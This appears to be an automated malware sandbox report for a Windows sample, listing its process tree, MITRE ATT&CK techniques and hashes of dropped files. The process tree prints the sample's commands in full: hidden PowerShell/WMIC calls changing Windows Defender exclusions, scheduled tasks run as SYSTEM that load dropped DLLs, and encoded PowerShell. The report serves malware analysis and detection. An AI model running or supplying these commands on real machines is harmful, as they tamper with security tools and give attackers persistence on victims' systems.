C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:1532
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2880
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2996
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2280
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\rZPMEzngU\KlUDVj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ddAsdXfMPNFuAfl" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ddAsdXfMPNFuAfl2" /F /xml "C:\Program Files (x86)\rZPMEzngU\AbwIxGZ.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ddAsdXfMPNFuAfl"3⤵PID:2628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ddAsdXfMPNFuAfl"3⤵PID:1528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kOGKgYpsUQIYrn" /F /xml "C:\Program Files (x86)\KDENuaOqQISU2\lhRUvgV.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YbcvEstkhVXck2" /F /xml "C:\ProgramData\XKbpoCnULTQzsVVB\AsNJLdY.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eLfFCqzmhHqfRsiNs2" /F /xml "C:\Program Files (x86)\itCXZnYssICbfHKCXDR\CNKbPLX.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AkaVbrYIdJsqguUJkZJ2" /F /xml "C:\Program Files (x86)\LAYqAmppRtojC\pqOgkxR.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EzpqHUsZzUnFxcQTT" /SC once /ST 00:30:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WIjQsZOhtuiKSoXd\uAYEWXQn\gkGODuj.dll\",#1 /BdidAk 525403" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EzpqHUsZzUnFxcQTT"3⤵PID:2488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NEaCSBqXysBCPlvqA"3⤵PID:812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 15843⤵
- Loads dropped DLL
- Program crash
PID:2220
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WIjQsZOhtuiKSoXd\uAYEWXQn\gkGODuj.dll",#1 /BdidAk 5254032⤵PID:1244
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WIjQsZOhtuiKSoXd\uAYEWXQn\gkGODuj.dll",#1 /BdidAk 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2044 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EzpqHUsZzUnFxcQTT"4⤵PID:2572
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6F53D0FC-8CA0-45ED-9641-0C9A070407C7} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:292 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2996
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:684
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3032
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2452
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1004
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1124
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54d7cf2bae4c725e173bafd2cb67f64c6
SHA1017310204b9d5638d62f0567a8f4c391a438d994
SHA256e2806f18a163ebb7cb8b5e77b34a44fbcf66d7cad42894f03296381d5a5a2e0e
SHA512346c86583cb634160105e985249b9f791cf894cdb09969bdf899bcec9a9793c6ebde91f17585fca1f4ef51d3c3d61466812056e83fefb40723b00d8d258d2ecc
-
Filesize
2KB
MD508d45be388558683acac049d41221162
SHA1a4d5847df8744cb981ef032ff696e2c632c6fccb
SHA25631ad3e8800741ba243c20611d93f0af747a4d746fcad4406b3dd7291ce0f59e9
SHA51292c505eba4b7459878e556363ef5b829f151fe8d103e6d8296adfb62eaa0fe3b8a4ca735d6f6944bd2150c6883553c7210e494da910fdb0a9c970635373b08b5
-
Filesize
2KB
MD5b3081d51bc922cad63862f6bec9358f7
SHA1472a11015d2bdd623b2a0b9e4a1defdbfebaf3a0
SHA2563bee7afad61108bb16705bcce76b7a7b9830c7ee3cec49ac9f88be1f627b791e
SHA512fe1ea0cd0f7f169135b39b626d108a42ce5e29e7c1b49438584e0a601081198b0b41694c685e447a94a14df3c31790681a936046bcee93b4c83ef3fae249187a
-
Filesize
2KB
MD5dbaad0d2949996fbbba2a9368332a142
SHA1193802041cb119945a6372152fb9fbac002b286f
SHA2569fd0f69fbdbd93b8431c2cf8113a7601e4744ebc7017b609e387a12caeed9c0e
SHA512c4c179dd78d39f2a97e9f5ae2cb3b3dd344154a75559e4e1f6325ca66f146ed35e820407a609f891a18384a569ce98ec2bfb0218dffaee218fc3ce6c93fdf7b7
-
Filesize
2.0MB
MD5f703393389902a127f8e7f61b4bbd7c4
SHA19616f13c6332155ee8b1c29f23dd616d55ede32b
SHA2565172a520ec896985ba5b75ef211caf93f2ac13486b3b41070e186da9c8d532b2
SHA51231719f0ac28e3a870b820be39dbafd88fa1d931b4d6c9622615368d04f43f446a54acc03d6dd5c7335c29140dcd683fd43ebe8cc604b158eca30fa98c83dfb71
-
Filesize
2KB
MD52a32b25fe07d6c428e617de6f5a2c5b6
SHA17be0d1f68dcabd035600cf20ff7623cea48662a9
SHA256fc84e3838d50c38c913611b54308995822223444e975c255966b559c73f0041f
SHA512ee794b8ea2426d9dd5cc7d048f4c41bfff5fcf9ee2218502880561ee61f605a2ab1017487c87e0f00919aa6fb14ef7910cc062e6fff68de621bac688e1a1ead1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD5894ad094b906a9abbdbdd0cb6567d1e2
SHA1da62124c11dabcc0e1bb15f371c76044d3cc4296
SHA256bf7702b2707788048ce52f46354c76438f195710ebc18dab1436614bf3fd2981
SHA51225dc7cc344910d8af49528468e6e4228b2ebb267f5502ce8d522d5ee4a3df47b60820cb9c5bac8708acc826f43aefadf8d78d60f6b9ba51a5800261e70ade0ce
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD528a1b8faa44c2f2246023dc8c5eaea95
SHA1ff41b2c7e59d41db2e511a7cc1b65d3094f047f8
SHA2560126776f71c1fcc979508f00c4aaa6bc6db38f3b9271a77cfce520b13dfb6f13
SHA51245687a73acf65e52d564a212a99efac4e1221af7a1ae89dc94103aba2cba9775080e34ba730fa7d3a1d7b0f9e1a444e953f1b9111ac806fe46e0c6cdd7eabe50
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NXGKDQWRMJZCBF05VM0H.temp
Filesize7KB
MD56e81f37f48861a2a69c2f74c34abfec1
SHA12b911d15038f960f7757b17510037e3d29515dbd
SHA25692a6730bf8b69671aa9e65141757b232ccb6f874af759719a2284c4df21a8f10
SHA51230ab4390ae6bcb7861e56d81833d782eeb532649ea720948d7ca877a6da566485907f5bc298d425aa8fa30c4a4f92a5600f89b72274d29cc0420dd764de4f7a0
-
Filesize
7KB
MD576215b6ed62474371df290833208ff69
SHA163d3b01da99b39eea83c8e642d8c0bdca44aad95
SHA25641ba44e5bcfbb37b6ff758b0576f7426474d5439848612ea1ab17312bec3af1d
SHA5120e300b37e420657319672237b513b1bfa950bd359f12647f9e25f1da64ea3d542ad738beeb5db3ddb91ec01a4a9da977ba4afb2063f340566acf75901a4b22b0
-
Filesize
9KB
MD5ea3fb61010b340b486db5617047ea344
SHA1660e2df115b490ac6f8133de53228ccaf91dc369
SHA256bdab93e451c393e84e2ec1c42c92288c3e7e36efb6f5deabc3e6d456ea044670
SHA5127d1435e13b14832b08e288970e82ef887f84c283ac4b90537e9224d03a2a23502d0d72ac57cce12ba5221c2b6c6ceef97cc5f7eba1215dc5ef24f925cb0fbbdb
-
Filesize
6.5MB
MD505d74d648db89507c0fe7fdb07eb7689
SHA1439e5ef79421caa80484d685fe12065c3d1791c0
SHA25624ed53d40ae08bd817fec287f1355e3ebbcbb06dec4af9ca995c745f37441318
SHA512561e8607cb4fecaf57c74b7cf815ae9ee3558893db39d41051902a2625039803f4ccbd2f5fd9d91a86557b148ec667fee08b239b1eb609f6080b796a08f88413
-
Filesize
6KB
MD5a22009124c8cd8b5f42306fb8701285f
SHA166104107bde2388a5cc8bc3771d23e2dedf91a82
SHA256ea0a2fb02e161dd50ccd53774e5c5e75180e048203c359050309517ec827b423
SHA512d819b78edaa01f5509c67b3b0bd8212b2f2ccc2fbdf986656eadcab55673f18ecb869461c5f52209db5d69b83c6caee788a575b2352b3ec20d9dc790eb1d3f40
-
Filesize
6.4MB
MD58414325a5eea51d28e8e6cd8115c0b27
SHA1a11cf007902fe5f76503fecc4aeac1304cc3c14b
SHA256f44e0cf414c78f625ea406fb34e4a3d78785087e5bd3eb65b456aa431b2d3353
SHA512571bc0f6fbe83d17ae372a5d6a88b8b6067daa3cfb39aecae2b43ea9560706cdceec02e0de5e1117bad19ae68b2efd4a6c939e0d87e7e6796b7dc7654894335c
-
Filesize
6.8MB
MD5b88154b4bba28d4a5a77de4288caa914
SHA16366388e441b5d19ce76492591d3578997b03c47
SHA2563435db8868cf3796ce484cd26c0dd26597d6d660eaa9437cc6e4403591140415
SHA512842929702e20d77776affcb12158b3226a09e114f3cffde04539f4521ff99cccbe2abd6710535a115c11cc570677b9ec1668cff1bef94aa447151e63bbf8a84c